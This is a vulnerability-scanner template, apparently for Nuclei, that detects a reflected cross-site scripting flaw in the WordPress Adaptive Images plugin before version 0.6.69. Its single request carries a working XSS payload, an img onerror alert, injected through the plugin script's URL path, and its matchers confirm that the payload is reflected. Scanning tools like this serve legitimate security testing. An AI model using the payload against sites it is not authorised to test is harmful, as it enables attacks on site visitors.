id: wp-adaptive-xss

info:
  name: WordPress Adaptive Images < 0.6.69 - Cross-Site Scripting
  author: dhiyaneshDK
  severity: high
  description: WordPress Adaptive Images < 0.6.69 is susceptible to cross-site scripting because the plugin does not sanitize and escape the REQUEST_URI before outputting it back in a page.
  reference:
    - https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0
    - https://plugins.trac.wordpress.org/changeset/2655683
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: wpscan,wordpress,xss,wp-plugin,wp

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<img/src/onerror=alert(document.domain)>'
          - '<td>Image</td>'
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/04/13
